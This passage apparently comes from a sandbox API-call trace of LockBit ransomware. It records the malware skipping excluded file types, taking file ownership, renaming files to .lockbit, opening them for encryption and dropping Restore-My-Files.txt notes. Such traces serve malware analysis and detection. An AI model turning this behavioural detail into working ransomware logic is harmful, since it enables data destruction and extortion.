[4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.230] CloseHandle (hObject=0x3b0) returned 1 [0079.230] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.231] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.231] free (_Block=0x53fcc0) [0079.233] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.233] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.lockbit")) returned 1 [0079.234] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0079.234] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.234] malloc (_Size=0x40068) returned 0x20ebb50 [0079.236] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x20ebb68 | out: lpFileSize=0x20ebb68*=43520) returned 1 [0079.236] ReadFile (in: hFile=0x3b0, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 1 [0079.244] GetLastError () returned 0x3e5 [0079.244] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.244] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.244] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.244] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="split.avi", cAlternateFileName="")) returned 1 [0079.244] lstrcmpiW (lpString1=".", lpString2="split.avi") returned -1 [0079.244] lstrcmpiW (lpString1="..", lpString2="split.avi") returned -1 [0079.244] PathFindExtensionW (pszPath="split.avi") returned=".avi" [0079.244] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0079.244] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0079.244] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0079.245] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0079.245] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0079.245] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0079.246] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0079.246] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.246] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="split.avi") returned -1 [0079.247] lstrcmpiW (lpString1="ntldr", lpString2="split.avi") returned -1 [0079.247] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="split.avi") returned -1 [0079.247] lstrcmpiW (lpString1="bootsect.bak", lpString2="split.avi") returned -1 [0079.247] lstrcmpiW (lpString1="autorun.inf", lpString2="split.avi") returned -1 [0079.247] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.247] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned=".avi" [0079.247] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0079.247] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0079.247] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0079.248] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0079.248] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.lockbit") returned 75 [0079.248] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0079.248] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.lockbit")) returned 0 [0079.248] GetLastError () returned 0x5 [0079.249] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.249] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.249] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.249] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.249] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.249] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.250] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.250] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.434] NtClose (Handle=0x3bc) returned 0x0 [0079.434] RtlFreeAnsiString (AnsiString="\\") [0079.434] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0079.434] malloc (_Size=0x200) returned 0x53fcc0 [0079.434] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.434] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.434] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.434] CloseHandle (hObject=0x3bc) returned 1 [0079.434] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.435] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.435] free (_Block=0x53fcc0) [0079.436] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0079.436] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.lockbit")) returned 1 [0079.437] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.437] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.437] malloc (_Size=0x40068) returned 0x206b860 [0079.437] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=194048) returned 1 [0079.437] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.439] GetLastError () returned 0x3e5 [0079.439] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.439] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.439] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.439] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa23a9ac, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa23a9ac, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0079.439] lstrcmpiW (lpString1=".", lpString2="tabskb.dll.mui") returned -1 [0079.439] lstrcmpiW (lpString1="..", lpString2="tabskb.dll.mui") returned -1 [0079.439] PathFindExtensionW (pszPath="tabskb.dll.mui") returned=".mui" [0079.439] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.439] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.439] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.440] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.440] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.441] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.441] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.441] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.441] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.441] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tabskb.dll.mui") returned -1 [0079.441] lstrcmpiW (lpString1="ntldr", lpString2="tabskb.dll.mui") returned -1 [0079.441] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tabskb.dll.mui") returned -1 [0079.441] lstrcmpiW (lpString1="bootsect.bak", lpString2="tabskb.dll.mui") returned -1 [0079.441] lstrcmpiW (lpString1="autorun.inf", lpString2="tabskb.dll.mui") returned -1 [0079.441] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.441] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned=".mui" [0079.441] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.441] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.442] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.442] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.443] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.443] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.443] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui.lockbit") returned 80 [0079.443] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.443] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.lockbit")) returned 0 [0079.447] GetLastError () returned 0x5 [0079.447] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.448] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.448] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.448] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.448] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.448] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.449] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.449] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.460] NtClose (Handle=0x3c0) returned 0x0 [0079.460] RtlFreeAnsiString (AnsiString="\\") [0079.460] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0079.460] malloc (_Size=0x200) returned 0x53fcc0 [0079.461] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.461] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.461] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.461] CloseHandle (hObject=0x3c0) returned 1 [0079.461] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.461] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.462] free (_Block=0x53fcc0) [0079.462] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.462] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.lockbit")) returned 1 [0079.463] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0079.463] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.463] malloc (_Size=0x40068) returned 0x3940048 [0079.463] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=3072) returned 1 [0079.463] ReadFile (in: 